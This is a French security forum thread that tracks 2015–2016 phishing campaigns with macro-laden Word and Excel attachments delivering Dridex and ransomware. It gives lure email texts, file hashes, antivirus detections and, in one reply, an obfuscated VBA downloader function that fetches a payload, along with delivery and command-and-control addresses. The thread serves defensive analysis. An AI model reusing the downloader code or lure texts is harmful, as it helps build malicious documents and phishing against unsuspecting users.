Campagnes de courriels piégés avec Word/Excel malicieux

L'actualité & News Informatique!
Donc pas de demande d'aide dans cette partie.
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Campagnes de courriels piégés avec Word/Excel malicieux

Message par Malekal_morte » 11 juin 2015 14:45

Nouvelle campagne Email malicieux avec des documents Word malicieux en pièce jointe depuis quelques jours qui coincidence avec des désinfections CryptoWall et CTB-Locker.

!
Ces campagnes utilisent beaucoup de documents Word malveillants, pour tout ce qui touche aux emails malveillants avec des documents Word et Excel, lire la page : Les virus par Word et Excel (documents Office) : comment s'en protéger

Principe de ces mails malicieux Word/Excel en vidéo :





Fausse facture MicroPlanet :
Image

et plus génant, de faux emails se faisant passer pour Free avec le sujet :
[Free] Notification de facture FreeBox
Image

Sur les captures ci-dessous, on peut voir Winword.exe qui ouvre un fichier malicieux après avoir ouvert le doc contenant la macro.
Image

Le malware fait ensuite une requête WEB pour se connecter au serveur WEB qui permet ensuite le contrôle de l'ordinateur ou le vol de données.

Image

Dossier et conseils sur les Campagne d'Email malicieux.
est un programme conçu pour minimiser ou bloquer les macros et autres scripts malicieux.
Voir aussi la page : [url=https://www.malekal.com/proteger-scripts-malicieux/]Comment se protéger des scripts malicieux sur Windows


Image

Ces Macros malicieuses sont détectés en TROJANDOWNLOADER:W97M par Microsoft et en W97M/Generic par AVG :

Image

Image

EDIT - Mi-Juin : Documents Offices avec des JavaScript ou VBS

Microsoft a aussi publié mi-juin des cas de documents Word malicieux contenant des JavaScript ou Script VBS, ces derniers sont détectés en TrojanDownloader:VBS/Vibrio ou TrojanDownloader:VBS/Donvibs.
Il s'agit donc de variantes, ici au lieu de demander à faire exécuter la macro (ou qu'elle s’exécute automatiquement selon la configuration d'Office), l'utilisateur doit double-cliquer sur l'icône contenu dans le document pour lancer le script malicieux et faire télécharger et exécuter le malware sur l'ordinateur.
Word_malicieux_VBS.png
Word Malicieux embarquant des scripts VBS ou JavaScirpt
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


zephyr
Messages : 1
Inscription : 12 juin 2015 00:32

Re: Nouvelle campagne Email (Word malicieux)

Message par zephyr » 12 juin 2015 00:42

Bonjour,

Quels logiciels conseillez vous pour la désinfection ?
J'ai testé cet après midi les logiciels suivant (mis à jour) mais j'ai eu aucune détection, pourtant le fichier a bien été ouvert sur plusieurs postes (mail free et microplanet)
Logiciels testés :
- Bitdefender live cd
- Avira rescue cd
- Malwarebytes
- Eset online scanner

Merci d'avance pour votre aide

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Nouvelle campagne Email (Word malicieux)

Message par Malekal_morte » 13 juin 2015 16:26

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Nouvelle campagne Email (Word malicieux)

Message par Malekal_morte » 15 juil. 2015 10:55

Nouvelle campagne d'email Word malicieux ce matin.
Rien de vraiment nouveau sur la méthode utilisée.

Voici une capture d'écran d'exemple de ces emails :
EmailMalicieux_virus.png
campagne Email (Word malicieux)
EmailMalicieux_virus_2.png
campagne Email (Word malicieux)
Les sujets des emails malicieux :
DUPLICATA FAC N749864-961731
acture juillet N3D0503-279251
Votre facture Importance NE80389-360236
Facture decadaire N0C2005-902318
Exemple de détection :
SHA256: cc3aa082f4e148bde7212d7cb392495df380d78be2b58ad58c4ceacd34319223
Nom du fichier : SKM_224e15070716540.doc
Ratio de détection : 6 / 55
Date d'analyse : 2015-07-15 09:14:49 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
AVG Downloader.Generic_c.KGZ 20150715
AVware LooksLike.Macro.Malware.g (v) 20150715
CAT-QuickHeal W97M.Dropper.DZ 20150715
F-Secure Trojan:W97M/MaliciousMacro.GEN 20150715
Qihoo-360 heur.macro.download.va 20150715
VIPRE LooksLike.Macro.Malware.g (v) 20150715
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Nouvelle campagne Email (Word malicieux)

Message par Malekal_morte » 17 juil. 2015 13:51

Les campagnes d'email malicieux Word continuent aujourd'hui avec :

beaucoup d'emails de fausses factures :

Image

Image

Image

Image

Mais aussi un faux email QuelleEnergie.fr :
Image

ou encore Crédit Agricole Du Languedoc :

Image

Un exemple de détection :
SHA256: ffe19c1914e952650c693a0ef4d8784690d63a34c20478c09764509ed94c0413
Nom du fichier : QuelleEnergie-FW2015-02093.doc
Ratio de détection : 7 / 55
Date d'analyse : 2015-07-17 11:53:22 UTC (il y a 4 minutes)

Antivirus Résultat Mise à jour
AVware LooksLike.Macro.Malware.g (v) 20150717
F-Secure Trojan:W97M/MaliciousMacro.GEN 20150716
McAfee W97M/Downloader.akh 20150717
McAfee-GW-Edition W97M/Downloader.akh 20150716
TrendMicro W2KM_BARTALEX.SMO 20150717
TrendMicro-HouseCall W2KM_BARTALEX.SMO 20150717
VIPRE LooksLike.Macro.Malware.g (v) 20150717
Microsoft détecte ces Word malicieux en TrojanDownloader:W97M
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Nouvelle campagne Email (Word malicieux)

Message par Malekal_morte » 21 juil. 2015 14:48

Les campagnes d'Email malicieux visants la France continuent avec quelques variantes.

Un email avec un fichier joint en XML :
Malicious_XML.png
XML Malicieux par mail
SHA256: d4dfd01ef5810427916dfb5240d1434a2f8cac1791355dfd5f59cfe77b5d0cc5
Nom du fichier : De_0491210554_04062015_11h00_5570139c1af9c.xml
Ratio de détection : 4 / 55
Date d'analyse : 2015-07-21 12:03:11 UTC (il y a 3 minutes)

Antivirus Résultat Mise à jour
CAT-QuickHeal O97M.Dropper.DZ 20150721
ESET-NOD32 VBA/TrojanDownloader.Agent.XP 20150721
McAfee W97M/Downloader.akh 20150721
McAfee-GW-Edition W97M/Downloader.akh 20150721
Mais aussi du Excel (.XLS) :
Malicious_XLS.png
XLS Malicieux par mail
SHA256: 71d881e9414469c2a7d4d39fef576e7810b0c02f7db71ad6f5ccde7e2dfe0f3f
Nom du fichier : 491858-19296925.xls
Ratio de détection : 1 / 55
Date d'analyse : 2015-07-21 12:01:09 UTC (il y a 20 minutes)

Antivirus Résultat Mise à jour
NANO-Antivirus Trojan.Script.Agent.djfdmm 20150721
Mais aussi quelques emails avec des Word au format 2007+ (extension .docm) :
Word2007_format.png
Word Malicieux en 2007
La majorité des emails restent des emails concernant des factures.
Email_malicieux_facture.png
Email malicieux Factures
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Nouvelle campagne Email (Word malicieux)

Message par Malekal_morte » 28 juil. 2015 11:05

Nouvelle campagne d'email malicieux avec des documents Word se faisant passer pour Air France.

Sujet du mail : Your Air France boarding documents on 10Jul
Expérditeur : cartedembarquement@airfrance.fr

Image

Image

La détection du document Word :
SHA256: f03a64d0a9715ad366e110e72ec3efb7ed268bf4f76a0512025d02aa74da09da
Nom du fichier : Boarding-documents.docm
Ratio de détection : 9 / 54
Date d'analyse : 2015-07-28 09:17:32 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
AVware LooksLike.Macro.Malware.g (v) 20150728
Arcabit HEUR.VBA.Trojan 20150728
CAT-QuickHeal O97M.Dropper.DZ 20150728
F-Secure Trojan:W97M/MaliciousMacro.GEN 20150728
McAfee W97M/Downloader.ala 20150728
Panda W97M/Downloader 20150727
TrendMicro W2KM_BA.35831666 20150728
TrendMicro-HouseCall W2KM_BA.35831666 20150728
VIPRE LooksLike.Macro.Malware.g (v) 20150728
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Nouvelle campagne Email (Word malicieux)

Message par Malekal_morte » 10 août 2015 12:46

C'est reparti aujourd'hui avec une nouvelle campagne d'email malicieux.

Les sujets des emails malicieux :
A traiter bouhdel 1822/65A4_7388962
Nettoyage 1550/3E2C_2708032
Devis nettoyage 1018/D444_6586458
Bon de commande 1709/35EC_6005592
TR: factures à regler 1050/2F24_2873859
On retrouve toujours des fichiers Word piégés qui contiennent des marco-commandes pour faire télécharger et installer un ou plusieurs programmes malveillants sur l'ordinateur. D'ailleurs la Gendarmerie française invite à faire preuve de vigilance face à la menace que représente Dridex
Mail_Word_malicieux_campagne.png
Nouvelle campagne Email (Word malicieux)
Mail_Word_malicieux_campagne_2.png
Nouvelle campagne Email (Word malicieux)
Mail_Word_malicieux_campagne_3.png
Nouvelle campagne Email (Word malicieux)
Mail_Word_malicieux_campagne_4.png
Nouvelle campagne Email (Word malicieux)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Campagnes de courriels piégés avec Word/Excel malicieux

Message par Malekal_morte » 18 août 2015 12:00

Nouvelle vague d'emails malicieux. Cette fois-ci, le fichier Word piégé n'est pas directement attaché en pièce jointe, l'utilisateur doit d'abord cliquer sur un lien raccourci indiqué sur le courriel.

Le contenu de l'e-mail malicieux :
Cher(e) client(e),

Votre facture n° 9710432A4/72 du 15/08/2015 est disponible sur votre espace client GR online, rubrique "Mes factures" - "Clic Facture".

Veuillez cliquer ci-dessous pour accéder et télécharger loriginal de votre dernière facture:

Accès à vos factures

Cette facture restera disponible au téléchargement pendant 18 mois. Au-delà de ces 18 mois, son téléchargement ne sera plus possible. Conformément à la réglementation nous vous rappelons quil vous appartient de procéder à son archivage électronique dans vos propres systèmes informatiques.

Pour toute question, vous pouvez contacter votre gestionnaire de compte dont les coordonnées figurent sur vos factures. A bientôt sur GR online !

Votre gestionnaire support
Word_malicieux_fausse_facture.png
Campagnes de courriels piégés avec Word/Excel malicieux
Le service de raccourci d'URLs utilisé est "YOURLS" ( y6p.ru )
Les redirections mènent toutes vers : http://91.224.141.226/rnd3.php/b3c9a1e395223b35917a7
Word_malicieux_fausse_facture_91.224.141.226.png
Word Malicieux http://91.224.141.226
Détection :
SHA256: 707fcc99236abc1125dcd73fc5fbe175ca7d29f09fba0111e78dae92e2452e55
Nom du fichier : facture_1966.doc
Ratio de détection : 1 / 56
Date d'analyse : 2015-08-18 09:24:47 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
Arcabit HEUR.VBA.Trojan 20150818
Cette campagne installe un ransomware chiffreurs de fichiers : Ransom:Win32/Tescrypt.A
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Campagnes de courriels piégés avec Word/Excel malicieux

Message par Malekal_morte » 13 oct. 2015 11:53

Nouvelle campagne de courriels avec documents Word piégés

0143485322 : fax du Numéro masqué (1 page)

Contenu du mail :
Vous avez reçu un fax en provenance du Numéro masqué.
Le fax au format DOC est joint à ce mail.

(avec une belle erreur d'encodage)

et une pièce jointe malicieuse :
fax-0143485322-000-20151006072552-1444109152.3022.doc
Mail_Word_malicieux_monfax.png
Campagne Word Malicieux 'mafax'
Les détections antivirus étaient de 2 sur VirusTotal et continuent d'augmenter :
SHA256: 29a8245b0718e32c9cb45705c919727741ebbbfff1c061cd5c0395ad7a56b9c2
Nom du fichier : fax-0143485322-000-20151006072552-1444109152.3022.doc
Ratio de détection : 5 / 56
Date d'analyse : 2015-10-13 09:34:33 UTC (il y a 1 minute)

Antivirus Résultat Mise à jour
AVware LooksLike.Macro.Malware.gen!d1 (v) 20151013
Arcabit HEUR.VBA.Trojan 20151013
F-Secure Trojan:W97M/MaliciousMacro.GEN 20151013
Fortinet WM/Agent!tr 20151013
VIPRE LooksLike.Macro.Malware.gen!d1 (v) 20151013


Télécharge SHA256: 73a7fba04d9cfae57ded8c5cdfaf27c794da77aaf9d8d10377d6808765a6b449
Dridex CnC :: <config botnet="220">
<server_list>
149.210.180.13:4483
86.105.33.102:1443
198.61.187.234:4483
92.51.129.33:4483

</server_list>
</config>
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Campagnes de courriels piégés avec Word/Excel malicieux

Message par Malekal_morte » 19 oct. 2015 11:51

Nouvelle campagne de courriels avec fausses factures imitant le service de compatibilité "Come in"

Le sujet : Votre FACTURE (61937162)

Le contenu du mail :
Cher client ,

Votre FACTURE Numéro 61937162 est à TELECHARGER en pièce jointe.

Attention, dans le cadre de cette démarche de développement durable, les factures ne sont plus expédiées par courrier.


Cordialement,

Alexis Guerin

Le Service Comptabilité Come in®
WordMalicieux_votre_facture.png
Word Malicieux

Autre courriel avec "Actual Rennes"

Le sujet : Facture / actual Rennes

Le contenu du mail :
Bonjour,

Vous trouverez ci-joint le détail d'une facture arrivée à  échéance.
Pouvez-vous me faire un retour?

Vous en souhaitant bonne réception,

Sincères salutations

Mathys Bernard
Chargée de clientèle,
Actual Rennes
Tél : 02.23.44.81.61
Fax : 02.23.44.80.99
WordMalicieux_votre_facture_actual_rennes.png
Mail malicieux : Facture / actual Rennes
Détection :
SHA256: 3bdb19361d877cd25ead7fe8b25fc6ac0d7f74bd347da77f0cfa77071bbfd3df
Nom du fichier : Facture_82588302_bla.doc
Ratio de détection : 2 / 56
Date d'analyse : 2015-10-19 09:42:21 UTC (il y a 1 minute)

Antivirus Résultat Mise à jour
NANO-Antivirus Trojan.Script.Agent.djfdmm 20151019
Tencent Heur.MSWord.Downloader.d 20151019


EDIT - La détection quelques jours après

SHA256: 8f26ede224e4dea4cc0b37dc90a2d0d6171528f4570d55ccc2a78a1cd7ad7466
Nom du fichier : fac_bla_7461043580.doc
Ratio de détection : 18 / 56
Date d'analyse : 2015-10-21 09:44:21 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
BitDefender W97M.Downloader.ACG 20151021
DrWeb W97M.DownLoader.673 20151021
ESET-NOD32 VBA/TrojanDownloader.Agent.AEW 20151021
Emsisoft W97M.Downloader.ACG (B) 20151021
F-Prot New 20151021
F-Secure W97M.Downloader.ACG 20151021
GData W97M.Downloader.ACG 20151021
Ikarus Trojan-Downloader.VBA.Agent 20151021
Kaspersky Trojan-Downloader.MSWord.Agent.to 20151021
McAfee W97M/Downloader.aow 20151021
MicroWorld-eScan W97M.Downloader.ACG 20151021
Microsoft TrojanDownloader:W97M/Bartallex 20151021
NANO-Antivirus Trojan.Script.Agent.djfdmm 20151021
Panda O97M/Downloader 20151020
Sophos Troj/DocDl-AED 20151021
Tencent Heur.MSWord.Downloader.d 20151021
TrendMicro W2KM_DRIDEX.NAI 20151021
TrendMicro-HouseCall W2KM_DRIDEX.NAI 20151021
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: Campagnes de courriels piégés avec Word/Excel malicieux

Message par ѠOOT » 19 oct. 2015 23:54

Les documents générés comportent le même nom d'auteur 'azaz' et la même société 'sdfdsf'.

:: MIME XML/HTML & MSO

Code : Tout sélectionner

<xml xmlns:o=3D"urn:schemas-microsoft-com:office:office">
 <o:MainFile HRef=3D"../efsdf.htm"/>
 <o:File HRef=3D"image001.jpg"/>
 <o:File HRef=3D"image002.jpg"/>
 <o:File HRef=3D"editdata.mso"/>
</xml>
Visuellement, les documents Microsoft Word contiennent deux images et un message.
Ces images de qualité médiocre sont identiques, l'une de 189x267 et l'autre 531x751.

Image

Elles sont pixelisées et donc quasiment illisibles.
C'est à partir de là qu'entre la ruse de l'attaquant.

Un faux message d'erreur est affiché au dessus de l'image.

An error occurred while preparing to display the contents. Macro is not enabled.
Please enable macros in order to correctly view the contents of the document.


Par défaut, les macros sont désactivées sur les documents Microsoft Office. Les attaquants vont donc tenter de persuader l'utilisateur que pour visualiser correctement le document il est nécessaire d'activer les macros.

Côté VBA, la fonction iuorewfcxz() du Module2 indique l'adresse de téléchargement. La requête sur http://xxx.xxx.xxx.xxx:8080/uniq/load.php incrémentera le compteur des statistiques et délivrera la charge.

Code : Tout sélectionner

Public Function iuorewfcxz()
iugJbjsdf = Chr$(57) & Chr$(51) & Chr$(46) & Chr$(49) & Chr$(55) & Chr$(48) & Chr$(46) & Chr$(49) & Chr$(48) & Chr$(52) & Chr$(46) & Chr$(49) & Chr$(54) & Chr$(56)
fHJvsdf = Chr$(116) & Chr$(116)
uagsdiuf = Chr$(48) & Chr$(56) & Chr$(48) & Chr$(47) & Chr$(117) & Chr$(110) & Chr$(105) & Chr$(113) & Chr$(47) & Chr$(108) & Chr$(111)
iuorewfcxz = Chr$(104) + fHJvsdf + Chr$(112) & Chr$(58) & Chr$(47) & Chr$(47) + iugJbjsdf + Chr$(58) & Chr$(56) + uagsdiuf + Chr$(97) & Chr$(100) & Chr$(46) & Chr$(112) & Chr$(104) & Chr$(112)
End Function
Dans les documents collectés, les macros commandes malveillantes téléchargent et exécutent depuis :
84.200.52.52:8080/TCP
93.170.104.168:8080/TCP
178.62.7.183:8080/TCP

Le programme actuellement téléchargé et exécuté correspond à 96DD8D5BE719EF432B846AE5416C163B | 2485C741AF50DE986079B6AD9B6C948A | 9D4225ECDCDA7FE9A5EAE48601919114

CnC ::
106.187.38.36:473
107.170.237.112:473
45.55.136.31:473


edit: ( 23 octobre 2015 ) FRANCE (Paris) - Les volumes de messages électroniques de type fausses facturations qui délivrent Dridex, un programme spécialisé dans le vol d'identifiants et de données bancaires, n'ayant pas diminués en 4 jours, une alerte CERTFR-2015-ALE-012 vient d'être émise.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Campagnes de courriels piégés avec Word/Excel malicieux

Message par Malekal_morte » 22 oct. 2015 13:38

Après une pause hier, les campagnes d'email de Word/Excel malicieux ont repris aujourd'hui.
Ce matin les mails étaient identiques à ceux d'avant hier et, il y a quelques minutes, un nouveau type de mails.

Les noms et email de l'expéditeur sonnent toujours aussi faux.

Exemple du corps du mail :
Bonjour,



Veuillez trouver ci-joint copie d’une facture pour un travail urgent demandé auprès de Julien.



L’originale est dans la bannette dans le bureau de Stéphanie.



Merci

Ruben Brun
Mail_Facture_Word_Malicieux.png
Campagnes de courriels piégés avec Word/Excel malicieux
On notera la détection TrendMicro en Dridex :
SHA256: 5c003bd07c6d14ab4d0741091bb4ac56fd23d3cc39ba29b9b50857f8498f3ce2
Nom du fichier : FACTURE-06937973-6BFE.doc
Ratio de détection : 5 / 55
Date d'analyse : 2015-10-22 11:32:35 UTC (il y a 0 minute)

BitDefender Trojan.Doc.Downloader.FF 20151022
Emsisoft Trojan.Doc.Downloader.FF (B) 20151022
Tencent Heur.MSWord.Downloader.d 20151022
TrendMicro W2KM_DRIDEX.XDK 20151022
TrendMicro-HouseCall W2KM_DRIDEX.XDK 20151022
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Campagnes de courriels piégés avec Word/Excel malicieux

Message par Malekal_morte » 26 oct. 2015 14:45

Les campagnes Dridex avec fausses factures continuent.

Une campagne qui se fait passer pour "PHS Group".

source :
Objet du mail :
Your new PHS documents are attached
Différentes sources d'envoi :
Received: from 82.79.245.91(Roumanie)
Received: from 171.251.56.246 (Vietnam)

Image

Image

Détection en Trojan.Doc.Downloader sur BitDefender :
SHA256: 8448dce775043e0fe09bf0dadaf7c7dabf901c129c503ef7f2668e4e2b6766aa
Nom du fichier : G-A0287580036267754265.doc
Ratio de détection : 5 / 55
Date d'analyse : 2015-10-26 12:38:11 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
AVware LooksLike.Macro.Malware.gen!d1 (v) 20151026
McAfee W97M/Downloader.apa 20151026
McAfee-GW-Edition W97M/Downloader.apa 20151026
Panda W97M/Downloader 20151026
VIPRE LooksLike.Macro.Malware.gen!d1 (v) 20151026
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: Campagnes de courriels piégés avec Word/Excel malicieux

Message par Malekal_morte » 16 févr. 2016 15:36

Une campagne de Word MAlicieux a actuellement lieu qui conduit au Ransomware Locky.

Image

La répartition de cette campagne de Word Malicieux Invoice, la France est bien touchée mais les USA l'est encore plus.
Cette campagne est similaire à celle du Trojan Dridex.
(source Paloaltonetworks)

Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « Actualité & News Informatique »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 2 invités